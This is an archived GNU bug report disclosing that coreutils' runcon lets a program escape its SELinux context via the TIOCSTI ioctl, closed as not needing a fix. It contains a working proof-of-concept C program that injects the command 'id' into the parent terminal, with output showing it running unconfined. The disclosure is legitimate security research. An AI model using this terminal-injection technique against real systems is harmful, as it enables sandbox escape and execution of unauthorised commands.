GNU bug report logs - #24541
runcon tty hijacking via TIOCSTI ioctl

Previous Next

Package: coreutils;

Reported by: up201407890 <at> alunos.dcc.fc.up.pt

Date: Sun, 25 Sep 2016 15:58:02 UTC

Severity: normal

Done: Paul Eggert <eggert <at> cs.ucla.edu>

Bug is archived. No further changes may be made.

Full log

View this message in rfc822 format

From: help-debbugs <at> gnu.org (GNU bug Tracking System)
To: Paul Eggert <eggert <at> cs.ucla.edu>
Cc: tracker <at> debbugs.gnu.org
Subject: bug#24541: closed (runcon tty hijacking via TIOCSTI ioctl)
Date: Mon, 26 Sep 2016 15:54:02 +0000

[Message part 1 (text/plain, inline)]
Your message dated Mon, 26 Sep 2016 08:53:34 -0700
with message-id <cd8c8f0b-4aee-e224-8816-6e835eee2bac <at> cs.ucla.edu>
and subject line Re: bug#24541: runcon tty hijacking via TIOCSTI ioctl
has caused the debbugs.gnu.org bug report #24541,
regarding runcon tty hijacking via TIOCSTI ioctl
to be marked as done.

(If you believe you have received this mail in error, please contact
help-debbugs <at> gnu.org.)


-- 
24541: http://debbugs.gnu.org/cgi/bugreport.cgi?bug=24541
GNU Bug Tracking System
Contact help-debbugs <at> gnu.org with problems

[Message part 2 (message/rfc822, inline)]
From: up201407890 <at> alunos.dcc.fc.up.pt
To: bug-coreutils <at> gnu.org
Subject: runcon tty hijacking via TIOCSTI ioctl
Date: Sun, 25 Sep 2016 13:39:55 +0200

When executing a program via the runcon utility, the nonpriv session
can escape to the parent session by using the TIOCSTI ioctl to push
characters into the terminal's input buffer, allowing an attacker to
execute arbitrary commands without the SELinux security context.

$ cat test.c
#include <unistd.h>
#include <sys/ioctl.h>

int main()
{
  char *cmd = "id\n";
  while(*cmd)
   ioctl(0, TIOCSTI, cmd++);
  execlp("/bin/id", "id", NULL);
}
$ gcc test.c -o test
$ runcon -t sandbox_t ./test
id
uid=1000 gid=1000 groups=1000  
context=unconfined_u:unconfined_r:sandbox_t:s0-s0:c0.c1023
$ id   <--- did not type this
uid=1000(saken) gid=1000(saken) groups=1000(saken)
context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

This issue has been recently patched in the SELinux sandbox (CVE-2016-7545):
https://github.com/SELinuxProject/selinux/commit/acca96a135a4d2a028ba9b636886af99c0915379

Thanks,
Federico Bento.

----------------------------------------------------------------
This message was sent using IMP, the Internet Messaging Program.




[Message part 3 (message/rfc822, inline)]
From: Paul Eggert <eggert <at> cs.ucla.edu>
To: up201407890 <at> alunos.dcc.fc.up.pt
Cc: 24541-done <at> debbugs.gnu.org, SE-Linux <SELinux <at> tycho.nsa.gov>
Subject: Re: bug#24541: runcon tty hijacking via TIOCSTI ioctl
Date: Mon, 26 Sep 2016 08:53:34 -0700

> "I don't think we need to fix this for runcon, as it isn't as
> sandboxing tool like sandbox, and the loss of job control would likely
> be much more noticeable for runcon."

Thanks, closing the debbugs bug report.
This bug report was last modified 7 years and 270 days ago.

Previous Next

GNU bug tracking system
Copyright (C) 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson.